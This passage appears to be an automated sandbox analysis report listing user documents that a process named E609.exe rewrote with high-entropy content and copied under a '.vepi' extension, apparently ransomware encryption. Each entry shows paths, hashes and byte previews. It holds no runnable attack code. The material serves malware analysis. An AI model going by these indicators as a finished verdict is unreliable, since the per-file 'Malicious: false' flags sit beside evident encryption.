Preview:	DTBZG....C1..U)<.m15....U...un.bou..z...t.5K....ddX...S.....=7.Rs...eoT.\|...8..d..a\|1........f.b.....".q\|}.Y6.c.0.e9...3Bhna.W........./0X.E.....b..5..?.........X?...#.v...FW..J.r..j./.....%.."..... ;#..S..oq.w[...6.....)..d.l ..d".D.,..R}A/BJ.....30D#.wF.4.q..]..&...to...L....k0.L..ub....%2..u....0...m`....I11....7.(.&.E/4..._ ..9....}I.4p.JK\|GL....!a.`....{.....D........o.h.~..3..gze.ZFG..zww....{`....s..!.}..{[A.75O.]..)&.u(H...1no.Q........:.........}.....)...,...T..P.T....f..o...q.GR.#/]..0.....F..=.0%)R>.:......M@2.7q.m...[.3.....5....Q~.....Dz.~C.$.?c.0}...O.....v..jH.s...a353....x.='..i....a.x.....>.*]......8JZK.I..Ed/,....bg(-8.B>p"...P..:X..`'0....,...H4pmO.L..;.J.G..r. .....ZW.e..\!....[...7......w....!.....$X..!0..>....u..(...f.i....C.....A+......j.hiZR.e4..7T.E...N.GX..6............x.._...4.H..6..qr.u=.u.A.'s......3Z>Tt.\|.p.....o.&...3.:{.(....-..72.s[6..NF.._<...]..{.A?....j..8..Y5.)4..F.....[.sw.]..?.S,.8...C.ZW<...\-x...

C:\Users\user\Documents\DTBZGIOOSO\HTAGVDFUIE.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851629947084147
Encrypted:	false
SSDEEP:	24:lVOyiWV+cU4+ACTlXNyJtYQQeODj3tWlajZV3wYswPOQ+Vl9CMAly1/NBzbD:lJliiupwl4P3wvwPO5l9GgjD
MD5:	33788470EA26129C8631205C2C86DF32
SHA1:	64A54D02921F91C5333FC269A3909CB7FCF33824
SHA-256:	C1AF5AE0F4987499DFB866DDC444406BBE44940C0FCF1BA9CBFB0530761D5284
SHA-512:	2CC355A489C094612CD440DBC32CA0DCA875F2C472334E21DF62A608AC9B9C1870F918F4B89C43EF6836D28DBF296073848F681107054CA0AB8FEE73022D4FCE
Malicious:	false
Preview:	HTAGV...z_.s..i.M.X......A..........~..Z.....>6i.'...Q.H.hS.q>qi...&.E......@.YK....v.....L......W...>.6..12K.~Y.w...:...`....^.'.b.9...O...W^...q....G.-{...~tgt..O...f.......6.1...p.0..../._. ....8...Ld.(.v......G.\|w....=..MG~T..He....d..a.....eV.1./S..j@{...C6pKQ.AW.e.~f..ta$..Z.2..E<....3....K+....-a.3.p..jv..."B."..v......`F%..../.\|....8...Q./.j..k..W..@.. T.UH-.4.......m^N..?mb..r.2.s].o......'x....`4....$..KyA.'..T;RW...S...B...>k.g..8.g..l.b.#Y.q.p\..)..^.....6.?........B..sZU.(.;..S.......h..@;.OlK+..6c.......]`..Dwb}..R.#Fs.;...m/54..>.[~]U.j..FJ...iJ.3.-{.K0....{$=x..zh.4P8.V..D.V..W.:..h9N.<3.d.;...$.O..P....<....vD.....x!..U..}.O.......97.2......t.7<...Kw.W......4.....f.....V..J.X_{.Tq...5..4....F.'.q.....eVpj...."u...f8.V....?8...J..#NIgo.........y..b...).6.B.C.<[o.../.U.."z..J.{.$.l.'..../...)..i....49$.C.x..:l.@$}.`....:Xx.P......(-.n.h..f.B.h.}..]..'.)....Ws.[?.J{.....!....-..Lm.jb..QF.4..y....x..Y...VS.K].\.....

C:\Users\user\Documents\DTBZGIOOSO\HTAGVDFUIE.jpg.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851629947084147
Encrypted:	false
SSDEEP:	24:lVOyiWV+cU4+ACTlXNyJtYQQeODj3tWlajZV3wYswPOQ+Vl9CMAly1/NBzbD:lJliiupwl4P3wvwPO5l9GgjD
MD5:	33788470EA26129C8631205C2C86DF32
SHA1:	64A54D02921F91C5333FC269A3909CB7FCF33824
SHA-256:	C1AF5AE0F4987499DFB866DDC444406BBE44940C0FCF1BA9CBFB0530761D5284
SHA-512:	2CC355A489C094612CD440DBC32CA0DCA875F2C472334E21DF62A608AC9B9C1870F918F4B89C43EF6836D28DBF296073848F681107054CA0AB8FEE73022D4FCE
Malicious:	false
Preview:	HTAGV...z_.s..i.M.X......A..........~..Z.....>6i.'...Q.H.hS.q>qi...&.E......@.YK....v.....L......W...>.6..12K.~Y.w...:...`....^.'.b.9...O...W^...q....G.-{...~tgt..O...f.......6.1...p.0..../._. ....8...Ld.(.v......G.\|w....=..MG~T..He....d..a.....eV.1./S..j@{...C6pKQ.AW.e.~f..ta$..Z.2..E<....3....K+....-a.3.p..jv..."B."..v......`F%..../.\|....8...Q./.j..k..W..@.. T.UH-.4.......m^N..?mb..r.2.s].o......'x....`4....$..KyA.'..T;RW...S...B...>k.g..8.g..l.b.#Y.q.p\..)..^.....6.?........B..sZU.(.;..S.......h..@;.OlK+..6c.......]`..Dwb}..R.#Fs.;...m/54..>.[~]U.j..FJ...iJ.3.-{.K0....{$=x..zh.4P8.V..D.V..W.:..h9N.<3.d.;...$.O..P....<....vD.....x!..U..}.O.......97.2......t.7<...Kw.W......4.....f.....V..J.X_{.Tq...5..4....F.'.q.....eVpj...."u...f8.V....?8...J..#NIgo.........y..b...).6.B.C.<[o.../.U.."z..J.{.$.l.'..../...)..i....49$.C.x..:l.@$}.`....:Xx.P......(-.n.h..f.B.h.}..]..'.)....Ws.[?.J{.....!....-..Lm.jb..QF.4..y....x..Y...VS.K].\.....

C:\Users\user\Documents\DTBZGIOOSO\LTKMYBSEYZ.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850532301063699
Encrypted:	false
SSDEEP:	24:u4f0DgnZVxVg+8fb6z3uDDhGkBv2OFFrrT87Ly888vHaN7CRjsFsbD:9QgnZVxVg3ZuMZoqs/aN7CRgsD
MD5:	4FD8FAAE3707EA88507EDE3C14F170EA
SHA1:	CF8708C7500BCB748C58A5C0244B3D70C07944B0
SHA-256:	FA696AE809C7567F2CDF8CAA3EDD12308AAF49A9DA0781736594896ABFB4F86C
SHA-512:	F92096865090E2EF88D8FD5279EB55A31FE8B65E3C8E4BBEC5308EEAC8AC554BD06C5ADED9B11F2ED7A5DEC77FFFE42584F9B6588D8913457F4B9254BB10679E
Malicious:	false
Preview:	LTKMY.>.9@..,&.y.....{.....\|....\|'..rTJ.l.5.P......%...W.5...vF......m\|...T.+.,j.G=.......fB.FT..R..=..6..".m...83@B..\|.-....>.i..p..{G....[....2.... .................uC....I._nME.v.P.Qu.E...~..l....i..` .u..f#.]0..R......&......H.1..{....(....i@.......J..K.W2.{.3.Z..m....h"+..7s..q....z......o[V.1.i..%.Y..i^.QM...e7.w..._.(..%.V.OA!.......1Z.......~.._@.X;J....Ld.6........}...).....@...c...~.>R..\.(........j?......r...!..v.`A.j.]..`d..4.4i..Ng.j ..ua.O.?o.Re.GS..0.jzp.T#.,.Z~.`zVi.o....Y.b....g..-..D.\...I......I.R....73...#.l!?.c...o..[.S..I..UR..11b.....>..VF.b.v.T$......D.{.VV}.J.G0..T...u..),.?HWjo_...$Q.:..8..E...7..u.`e..Q.....e".....I.`.R.......t.Y. .V.....!8_......S.......i..$.P.$.......1LU..P.J..c.n..^...n...".7..F.=#.]!.1Z.@.0.O..s.CP.D..Q[#(..d.........`-..+~.........2_$Nn...\t..0.vT.......V.....G.....S....A.p..=M..1..M.A...f7...i....C..k.+..A.....H.>....{..UB..q ...7.......E.0.G..h.:.7..o(.w...Y....n.T6?oz....R.

C:\Users\user\Documents\DTBZGIOOSO\LTKMYBSEYZ.png.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850532301063699
Encrypted:	false
SSDEEP:	24:u4f0DgnZVxVg+8fb6z3uDDhGkBv2OFFrrT87Ly888vHaN7CRjsFsbD:9QgnZVxVg3ZuMZoqs/aN7CRgsD
MD5:	4FD8FAAE3707EA88507EDE3C14F170EA
SHA1:	CF8708C7500BCB748C58A5C0244B3D70C07944B0
SHA-256:	FA696AE809C7567F2CDF8CAA3EDD12308AAF49A9DA0781736594896ABFB4F86C
SHA-512:	F92096865090E2EF88D8FD5279EB55A31FE8B65E3C8E4BBEC5308EEAC8AC554BD06C5ADED9B11F2ED7A5DEC77FFFE42584F9B6588D8913457F4B9254BB10679E
Malicious:	false
Preview:	LTKMY.>.9@..,&.y.....{.....\|....\|'..rTJ.l.5.P......%...W.5...vF......m\|...T.+.,j.G=.......fB.FT..R..=..6..".m...83@B..\|.-....>.i..p..{G....[....2.... .................uC....I._nME.v.P.Qu.E...~..l....i..` .u..f#.]0..R......&......H.1..{....(....i@.......J..K.W2.{.3.Z..m....h"+..7s..q....z......o[V.1.i..%.Y..i^.QM...e7.w..._.(..%.V.OA!.......1Z.......~.._@.X;J....Ld.6........}...).....@...c...~.>R..\.(........j?......r...!..v.`A.j.]..`d..4.4i..Ng.j ..ua.O.?o.Re.GS..0.jzp.T#.,.Z~.`zVi.o....Y.b....g..-..D.\...I......I.R....73...#.l!?.c...o..[.S..I..UR..11b.....>..VF.b.v.T$......D.{.VV}.J.G0..T...u..),.?HWjo_...$Q.:..8..E...7..u.`e..Q.....e".....I.`.R.......t.Y. .V.....!8_......S.......i..$.P.$.......1LU..P.J..c.n..^...n...".7..F.=#.]!.1Z.@.0.O..s.CP.D..Q[#(..d.........`-..+~.........2_$Nn...\t..0.vT.......V.....G.....S....A.p..=M..1..M.A...f7...i....C..k.+..A.....H.>....{..UB..q ...7.......E.0.G..h.:.7..o(.w...Y....n.T6?oz....R.

C:\Users\user\Documents\DTBZGIOOSO\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.847196057171441
Encrypted:	false
SSDEEP:	24:bNtPk+TvPHs4fHCadeQ6vnfaz/YyN85lbBQMJzDSuKgLQDwKzAbD:bNtvPH0BLvfk/Yy0btzOOLrKGD
MD5:	9960A4E053D02302B9CCB31F74FA9DDD
SHA1:	13CAD75103811F3D89F8BB60EE3E2561F9AD7D17
SHA-256:	C77B6325FFF5B616C1B76ED73D4FB6B9C6114FF27EF893642A60C1A043840F6A
SHA-512:	623CCF59250ABACBFA7E686427D2496ED6FB0BB4030562952B96F30BB94BBA6088D773DD272F17737CC16F260B37F6AE95D51BE7CA41E5124604886364318251
Malicious:	false
Preview:	ONBQC....B...\."..l..'I[.9%.....x.ii.O.]rl...a/..O..?E............f...0 ...?.....e.hz..`d.....i;[..s.Q!X.l..4 S...i....C....n..=....K.L..r.8aB..L..(..zM0P.LWY..,.".\.K..f....2..._9.khcy...O..Y@..\.4..Q6.I..!..f&...n1^...%-5%......^.......S{......Y..<..]...$.zB.G.]...F.<..n.#....pAj9......X)6......q..F...lX6....H\t.o{0#..'....V1B...+........A..k..u.gu.0.j.;_.4u..~._'p.r..G...~.)..)s...g.&%S...`\@.6........p..s..P.\|......W.i.R;....j8). .Q_.~Up.......RQ..-l]o...,..%.f..`.`5.$...$..r..i....5G....@Y..b.......L....x,sm.3.L.M.....^}...W.j......p~&.k.G....p.3.zA.............;..dB.P....$.......X..ck....-....q..B./.....\5... \|.^.b.qw.....SuH(MY.zY...fj'...c.O..b.R..?...9.....j..........s......w$..~/,..U.G.t#k.S...i.l.28........d.~J5. w....:....2F...;cYz.(..F.....;..rD..0..\|/'....!XE.^1..!.....8.,i.....3.h5.....L.z.\.-...]$.t...t.Fp,1....7.w9..J6.'.._..o.@.}A..O.B"d-.4.wf.3....%W6`i.~j..j..<.;. .ZL.J..R-x....;q....w.......A.K\.....

C:\Users\user\Documents\DTBZGIOOSO\ONBQCLYSPU.xlsx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.847196057171441
Encrypted:	false
SSDEEP:	24:bNtPk+TvPHs4fHCadeQ6vnfaz/YyN85lbBQMJzDSuKgLQDwKzAbD:bNtvPH0BLvfk/Yy0btzOOLrKGD
MD5:	9960A4E053D02302B9CCB31F74FA9DDD
SHA1:	13CAD75103811F3D89F8BB60EE3E2561F9AD7D17
SHA-256:	C77B6325FFF5B616C1B76ED73D4FB6B9C6114FF27EF893642A60C1A043840F6A
SHA-512:	623CCF59250ABACBFA7E686427D2496ED6FB0BB4030562952B96F30BB94BBA6088D773DD272F17737CC16F260B37F6AE95D51BE7CA41E5124604886364318251
Malicious:	false
Preview:	ONBQC....B...\."..l..'I[.9%.....x.ii.O.]rl...a/..O..?E............f...0 ...?.....e.hz..`d.....i;[..s.Q!X.l..4 S...i....C....n..=....K.L..r.8aB..L..(..zM0P.LWY..,.".\.K..f....2..._9.khcy...O..Y@..\.4..Q6.I..!..f&...n1^...%-5%......^.......S{......Y..<..]...$.zB.G.]...F.<..n.#....pAj9......X)6......q..F...lX6....H\t.o{0#..'....V1B...+........A..k..u.gu.0.j.;_.4u..~._'p.r..G...~.)..)s...g.&%S...`\@.6........p..s..P.\|......W.i.R;....j8). .Q_.~Up.......RQ..-l]o...,..%.f..`.`5.$...$..r..i....5G....@Y..b.......L....x,sm.3.L.M.....^}...W.j......p~&.k.G....p.3.zA.............;..dB.P....$.......X..ck....-....q..B./.....\5... \|.^.b.qw.....SuH(MY.zY...fj'...c.O..b.R..?...9.....j..........s......w$..~/,..U.G.t#k.S...i.l.28........d.~J5. w....:....2F...;cYz.(..F.....;..rD..0..\|/'....!XE.^1..!.....8.,i.....3.h5.....L.z.\.-...]$.t...t.Fp,1....7.w9..J6.'.._..o.@.}A..O.B"d-.4.wf.3....%W6`i.~j..j..<.;. .ZL.J..R-x....;q....w.......A.K\.....

C:\Users\user\Documents\DTBZGIOOSO\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838821875966545
Encrypted:	false
SSDEEP:	24:UGUj0dRSZlErFfCsRl9mrTXsoeMcfOtKFH0qT32qnsaBC1ya+rbOAbD:TdRqofCsRHCQoZcfO0mq720sxyDjD
MD5:	AAE4FCA8BFE0FD48B941A27A0746BB00
SHA1:	FFDD97B5B646848B83732E0E3D6C0E36981DA7AA
SHA-256:	B1F409C364E97C87A213445D3D85CDA6464564A50DDAD2182F74932D9DD9E3BB
SHA-512:	1FAA2589506588257CBB3E9B6E37F4D76E57827CECDF33D49C16B03834DAC10688B43718119FC788E21B02656F9DE328D6F76B3FF465F5ABC613731FBCEEAC75
Malicious:	false
Preview:	UMMBDHj..."i.:.d...._y.kY....U...+8.a..G....cX.;.........`8.G.).....N.@.....B...=.@..c9"i......O...e.OJF..F........T..d6._..r.bv.d..o0A../.T...8c..3.p.......~..BZ~..:.#.L...p.9...M9.~..y^w.'..........ga....&8..L.Yx1.Q..C?...Js.nb..}.'PC..!..z[.-.}.:....c.F.GI.....V8c..H.97..l..k..G<9....P.\.vw...Z2..V..g4..Y./.o._`...ptK4.._..=.K.~.H._R..d}......P...`..p.>M..8../O)."z%.i\d...4...H6L.7^.#.kG.Z#....Npx&..71..Oc?...E7..V..K`7..c.Z.`y.\-....&.a.N......f...W!....M....~....V..R./..kE...DM..b.'..4l@..2..[.L.Z.W...B1`SF...Zf....j$.Z.L={.D%.5}..$..#.ZS2..3...v.....@d.P.o...T.B.J...\i...[=mD>....2....b.&9.....R..F......3o....?i.K.2...9x....u.F.b...(@..;o.,m}....g.d...D8.>(.......l.e....u..Y.t.Zw.T....u....n".....Qt1....y..>...$R@.[.#fP Jdpd......s..{.u.1.?-..$..1n........8.),!.;.x9.$Qn..C...\|!.i`Y..:wf.#...6.3...k>...>......*:... 9..d..-mU.../.......t.{#.."..`..HX..J.W=..F.].....Em.....&V.d.....L...^.....$..N..,...O....gt(.].1.b,/"m$.......9.

C:\Users\user\Documents\DTBZGIOOSO\UMMBDNEQBN.pdf.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838821875966545
Encrypted:	false
SSDEEP:	24:UGUj0dRSZlErFfCsRl9mrTXsoeMcfOtKFH0qT32qnsaBC1ya+rbOAbD:TdRqofCsRHCQoZcfO0mq720sxyDjD
MD5:	AAE4FCA8BFE0FD48B941A27A0746BB00
SHA1:	FFDD97B5B646848B83732E0E3D6C0E36981DA7AA
SHA-256:	B1F409C364E97C87A213445D3D85CDA6464564A50DDAD2182F74932D9DD9E3BB
SHA-512:	1FAA2589506588257CBB3E9B6E37F4D76E57827CECDF33D49C16B03834DAC10688B43718119FC788E21B02656F9DE328D6F76B3FF465F5ABC613731FBCEEAC75
Malicious:	false
Preview:	UMMBDHj..."i.:.d...._y.kY....U...+8.a..G....cX.;.........`8.G.).....N.@.....B...=.@..c9"i......O...e.OJF..F........T..d6._..r.bv.d..o0A../.T...8c..3.p.......~..BZ~..:.#.L...p.9...M9.~..y^w.'..........ga....&8..L.Yx1.Q..C?...Js.nb..}.'PC..!..z[.-.}.:....c.F.GI.....V8c..H.97..l..k..G<9....P.\.vw...Z2..V..g4..Y./.o._`...ptK4.._..=.K.~.H._R..d}......P...`..p.>M..8../O)."z%.i\d...4...H6L.7^.#.kG.Z#....Npx&..71..Oc?...E7..V..K`7..c.Z.`y.\-....&.a.N......f...W!....M....~....V..R./..kE...DM..b.'..4l@..2..[.L.Z.W...B1`SF...Zf....j$.Z.L={.D%.5}..$..#.ZS2..3...v.....@d.P.o...T.B.J...\i...[=mD>....2....b.&9.....R..F......3o....?i.K.2...9x....u.F.b...(@..;o.,m}....g.d...D8.>(.......l.e....u..Y.t.Zw.T....u....n".....Qt1....y..>...$R@.[.#fP Jdpd......s..{.u.1.?-..$..1n........8.),!.;.x9.$Qn..C...\|!.i`Y..:wf.#...6.3...k>...>......*:... 9..d..-mU.../.......t.{#.."..`..HX..J.W=..F.].....Em.....&V.d.....L...^.....$..N..,...O....gt(.].1.b,/"m$.......9.

C:\Users\user\Documents\DTBZGIOOSO\WUTJSCBCFX.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858805364599316
Encrypted:	false
SSDEEP:	24:9z4nTw031u/oDrv36Q3WuUiidBu+rOlSi2eflo7wuopP7JBdyDVq7t0KMJbmbD:0UZ/oDrvKIUhdBucOnp96IPT99MJID
MD5:	EE76ED0ED289AE2B12957399517D9817
SHA1:	00B84FC1C8B4B3982DABEE8925DBB98435E91F6A
SHA-256:	C9768C516D5EAE08C9241FE45F9F1F919C98584EC055763C0054344D4B8929E7
SHA-512:	0E99DCD173D21A4077770950E44388BE8925C24945A7BC1E0300C39BDA35489A6565B0085B85A6C0C51D74B8C42DB0D52745476B85360268E29E8E6D3DD247F6
Malicious:	false
Preview:	WUTJS...5...8_.X..r.<.d.O...2>..1i..@JU..x@.&.x..z.....'.u.... .B..w.....q....v.?./6...6........\|..%....no..J....M.m...,>'..F,cPj'..G.1L=..-.:d.R...]...\|+...>..1.....5_.;\|......{%L.....}B...\|&.)2......{p......$PY.Wms.Mu....1E....s.~..._..@....j)=.........l:-..i.F..r]..(az^.!..o.E.,..^!.........f^8.VO]..T..}.\:.S......3_...d..k.....fCYt[`.......!..l9...'...FOw....?.8..nd!..q.Y.s$.V.a.p...I.<\|9..\|!#u..n......i.M._Zz..:..0....6.\5._......1]%.I..>..g.....V...'._.X.n.....G...4..'.......6...B@S..2XMNO...T3{=..>.H@L.V...Y...%.....T........2............u....V.*..f.W....sm.N...q[..K.-...C..-.....=XQe$..t=.Yp..F...Cna....[.DL..z..=...J4. Z.E.P.M.'~..>.n.@O%w.kS$...WM...%....G.^..#.\|....-.m[..+P.dY.-.(..w_S.A.e.h..BI.M...L[(..%..J.1y5..:).i .f.S^ysJp?...]X.=e..!.7p.b....\/...).<.}...[.-4.h.+=N..G!.g......S.Bwa...H...b;{(e........=.Z....@wb!..A.b..(.C....g.qA..>r.h.L...+D.Ni.R`t.......{.i.#...N.3....&'..,,.a............g..w9z..8I3..j.W............

C:\Users\user\Documents\DTBZGIOOSO\WUTJSCBCFX.mp3.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858805364599316
Encrypted:	false
SSDEEP:	24:9z4nTw031u/oDrv36Q3WuUiidBu+rOlSi2eflo7wuopP7JBdyDVq7t0KMJbmbD:0UZ/oDrvKIUhdBucOnp96IPT99MJID
MD5:	EE76ED0ED289AE2B12957399517D9817
SHA1:	00B84FC1C8B4B3982DABEE8925DBB98435E91F6A
SHA-256:	C9768C516D5EAE08C9241FE45F9F1F919C98584EC055763C0054344D4B8929E7
SHA-512:	0E99DCD173D21A4077770950E44388BE8925C24945A7BC1E0300C39BDA35489A6565B0085B85A6C0C51D74B8C42DB0D52745476B85360268E29E8E6D3DD247F6
Malicious:	false
Preview:	WUTJS...5...8_.X..r.<.d.O...2>..1i..@JU..x@.&.x..z.....'.u.... .B..w.....q....v.?./6...6........\|..%....no..J....M.m...,>'..F,cPj'..G.1L=..-.:d.R...]...\|+...>..1.....5_.;\|......{%L.....}B...\|&.)2......{p......$PY.Wms.Mu....1E....s.~..._..@....j)=.........l:-..i.F..r]..(az^.!..o.E.,..^!.........f^8.VO]..T..}.\:.S......3_...d..k.....fCYt[`.......!..l9...'...FOw....?.8..nd!..q.Y.s$.V.a.p...I.<\|9..\|!#u..n......i.M._Zz..:..0....6.\5._......1]%.I..>..g.....V...'._.X.n.....G...4..'.......6...B@S..2XMNO...T3{=..>.H@L.V...Y...%.....T........2............u....V.*..f.W....sm.N...q[..K.-...C..-.....=XQe$..t=.Yp..F...Cna....[.DL..z..=...J4. Z.E.P.M.'~..>.n.@O%w.kS$...WM...%....G.^..#.\|....-.m[..+P.dY.-.(..w_S.A.e.h..BI.M...L[(..%..J.1y5..:).i .f.S^ysJp?...]X.=e..!.7p.b....\/...).<.}...[.-4.h.+=N..G!.g......S.Bwa...H...b;{(e........=.Z....@wb!..A.b..(.C....g.qA..>r.h.L...+D.Ni.R`t.......{.i.#...N.3....&'..,,.a............g..w9z..8I3..j.W............

C:\Users\user\Documents\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860186113736886
Encrypted:	false
SSDEEP:	24:8+oJOj78kRU7jyGixXHZOTpkwftWoPujLvpEhOeJdOemCti+bD:kywvnyGixXHZvwf8UuvvpEhOgOetbD
MD5:	7D161FF86BC770AB5CD3BA44F87148D6
SHA1:	5638B1F83E7F9092946639E2E57AA030C38C2972
SHA-256:	F76683C70C8399B9CC3DD8E28C70E945D7726FF7D4D58F849C0755DD68E39D04
SHA-512:	1271BC7C5A3E603BC4B1560804F2301224C4870E9765A1BEA6CA4C611D49DECBB483E290E14EC46C0804D4033233BAC100AE880E2DA06173EEC9C162968FE459
Malicious:	false
Preview:	DVWHK ..eU0.1"W...&v..T}......4.^..]...l. ..\Ol.eh..ly.n.{.z...)./?..........th.........T.5.s.X...?..<.6iu..%FB......Ga\J...7..../.B .....R...v;..Hm.Y..e..82...(P ...<n)...b~.S....d.0.=.:........l.x.dWH....."....Is...'..#..2l`.z..U....<.....p.&..+.i.86..T...)......:`..D..,..F.I..Vb 2...Q.......:r..v.9`...Y.i....O...W0..T..#.Ibs....Z5..\8+!6c..1.u@.}5.1..[63.-..I...r.a...X<..x...C...oH..+#.l.n.{..f....u. .........lK!$..........q.;.l...4..=....6..Q.v...g.&....S...b+1...Gp..".k.w..=.,.p..ja....-....irA_X....3Z........w.L{..JE.U.m_.>.e.;..~[.."..[W7..\|.&.X....r.K..z....{.../.^NV....:y...5..7.2..?L.U..[.,..-...XN$..6@.._....lRuz^.pq.%...OY._.B....}.'..Fd.OXR..E.q..3c.4=.r.fh.vx}ClX....U.B..X.RF]....i....K.tjYh..&..Pg..i...............~.........2....-..~qI%......".z.>zj....K3..'.dK..#....1.~.H=...o.1..VD.ZA.3;.n.#.N"........0.Dr6..@l\E.Z...x.....Oy.....&.l....T...w..W.3.O..a.ll\|..{4.....,.La.Wa..\|.Y.....\|f...R....`z.h.........9....LrdL:\.....U..-.6{

C:\Users\user\Documents\DVWHKMNFNN.pdf.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860186113736886
Encrypted:	false
SSDEEP:	24:8+oJOj78kRU7jyGixXHZOTpkwftWoPujLvpEhOeJdOemCti+bD:kywvnyGixXHZvwf8UuvvpEhOgOetbD
MD5:	7D161FF86BC770AB5CD3BA44F87148D6
SHA1:	5638B1F83E7F9092946639E2E57AA030C38C2972
SHA-256:	F76683C70C8399B9CC3DD8E28C70E945D7726FF7D4D58F849C0755DD68E39D04
SHA-512:	1271BC7C5A3E603BC4B1560804F2301224C4870E9765A1BEA6CA4C611D49DECBB483E290E14EC46C0804D4033233BAC100AE880E2DA06173EEC9C162968FE459
Malicious:	false
Preview:	DVWHK ..eU0.1"W...&v..T}......4.^..]...l. ..\Ol.eh..ly.n.{.z...)./?..........th.........T.5.s.X...?..<.6iu..%FB......Ga\J...7..../.B .....R...v;..Hm.Y..e..82...(P ...<n)...b~.S....d.0.=.:........l.x.dWH....."....Is...'..#..2l`.z..U....<.....p.&..+.i.86..T...)......:`..D..,..F.I..Vb 2...Q.......:r..v.9`...Y.i....O...W0..T..#.Ibs....Z5..\8+!6c..1.u@.}5.1..[63.-..I...r.a...X<..x...C...oH..+#.l.n.{..f....u. .........lK!$..........q.;.l...4..=....6..Q.v...g.&....S...b+1...Gp..".k.w..=.,.p..ja....-....irA_X....3Z........w.L{..JE.U.m_.>.e.;..~[.."..[W7..\|.&.X....r.K..z....{.../.^NV....:y...5..7.2..?L.U..[.,..-...XN$..6@.._....lRuz^.pq.%...OY._.B....}.'..Fd.OXR..E.q..3c.4=.r.fh.vx}ClX....U.B..X.RF]....i....K.tjYh..&..Pg..i...............~.........2....-..~qI%......".z.>zj....K3..'.dK..#....1.~.H=...o.1..VD.ZA.3;.n.#.N"........0.Dr6..@l\E.Z...x.....Oy.....&.l....T...w..W.3.O..a.ll\|..{4.....,.La.Wa..\|.Y.....\|f...R....`z.h.........9....LrdL:\.....U..-.6{

C:\Users\user\Documents\HTAGVDFUIE.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866907155854782
Encrypted:	false
SSDEEP:	24:8/RjcT6UAagZJ/iC6n/KbnV4BF+yEipLFk27Nj5aZ8lXVhHNl6BnCCendybD:aRjcTXAb53zbaBBrLFLBjW8p/3AsdgD
MD5:	13A63CFF7C9256C9CD1AF72182BFBD9F
SHA1:	25120D1A3E09A8F89B27C43562A56888A08E5B28
SHA-256:	E32126A4631FFEB383C04A2AC35B08BA6C2B3EE57F5DCAF0B730A368DB77BFD2
SHA-512:	15DCC064089D8F772D13D1E8B2D3AF7C0F40089A54D9DD32BC2BFAC9EC6008000A329F2058088EC2E5CB15B904EB3E00081389FEBA4E145FCE10726D78FA4B40
Malicious:	false
Preview:	HTAGV[..yx.u}v.%...z:..L..rj.gL..Qx.4.l...`.....DY.....q..5......n.v..".3.Xd.........e+wwJ....g@CwsE>P2..9....E.cy..~..S'....v.qw2b`m4S^.v.....N......A+,.6.C&....1W...4\|4.@.T.BTS&}.r...uLX.H.1~g....\.k.%.l.!..%#..zx.V. ...I.O.5.(.....O]i.;....'>.XX1....@.m.I.m....y...9.l..z..W&...k.....G..GP.BA..Xo)<....Yh'@.......}..-g/s{EL.x./Z............)!..+......~#J.C<J0...G...;EV......).-..I.DM..P..\...1..Ni..+.G..3.....?v.)...,"...Tr&.`...p.)h.....A....]..Q...HK._I.q6..0l.d.e%.....{LE(...Cn=m.O{....../.]..u.A........@.p........YZ% ...*.hj....l...../..0x...:.>......>.#].[6..R.^.D...kh/...+....4.6..$.].~Z.... Q8.....n.0......5h.V...M......."..0i]s...2uO.....M.[..Z+gH....,l.v.IK..0..c..%..b.p5\.&..G.,..MGK.?..;....n..U....\| i8.Q.<.R..,.Z..".1..e.K...MICmX...3PjW.G....H,k..[i.`\....+q...F..} B.N1.1..=...5~.D..W.}X..(C......dl.......fn......-.....-.'3..v..%....x. ).V.<..l.....GHe.....)U....-....~7xB]Vm=.p(.r...J.0l/...U..f......I.U}.F.4...f${..g.ih.b

C:\Users\user\Documents\HTAGVDFUIE.jpg.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866907155854782
Encrypted:	false
SSDEEP:	24:8/RjcT6UAagZJ/iC6n/KbnV4BF+yEipLFk27Nj5aZ8lXVhHNl6BnCCendybD:aRjcTXAb53zbaBBrLFLBjW8p/3AsdgD
MD5:	13A63CFF7C9256C9CD1AF72182BFBD9F
SHA1:	25120D1A3E09A8F89B27C43562A56888A08E5B28
SHA-256:	E32126A4631FFEB383C04A2AC35B08BA6C2B3EE57F5DCAF0B730A368DB77BFD2
SHA-512:	15DCC064089D8F772D13D1E8B2D3AF7C0F40089A54D9DD32BC2BFAC9EC6008000A329F2058088EC2E5CB15B904EB3E00081389FEBA4E145FCE10726D78FA4B40
